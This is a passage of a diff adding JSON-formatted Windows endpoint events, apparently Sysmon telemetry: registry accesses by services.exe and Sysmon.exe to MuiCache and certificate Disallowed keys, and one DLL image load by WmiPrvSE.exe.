"event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570848860000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570848860000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570848860000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 
131883570848860000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570848860000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "image_load", + "image_name": "FWPUCLNT.DLL", + "image_path": "C:\\Windows\\System32\\FWPUCLNT.DLL", + "pid": 3808, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883570848390000, + "unique_pid": "{42FC7E13-B2BB-5C05-0000-0010E9ED0200}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570849020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849020000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": 
"C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570849020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570849020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570849020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570849020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local 
Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849020000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570849020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570849020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570849020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570849020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + 
"event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570849020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570849020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570849020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570849020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570849020000, + 
"unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570849020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849020000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570849020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570849020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": 
"C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570849020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570849020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849020000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570849020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + 
"registry_value": "Certificates", + "timestamp": 131883570849020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570849020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570849020000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849020000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849020000, + "unique_pid": 
"{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849020000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849020000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849020000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local 
Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849020000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849020000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849020000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849020000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local 
Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849020000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849020000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849020000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849020000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": 
"C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849020000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849020000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849020000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849020000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + 
"event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849020000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849020000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849020000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + 
"timestamp": 131883570849020000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849020000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849020000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570849020000, + "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" + }, + { + "event_type": "registry", + "pid": 568, + "process_name": "services.exe", + "process_path": "C:\\WINDOWS\\system32\\services.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": 
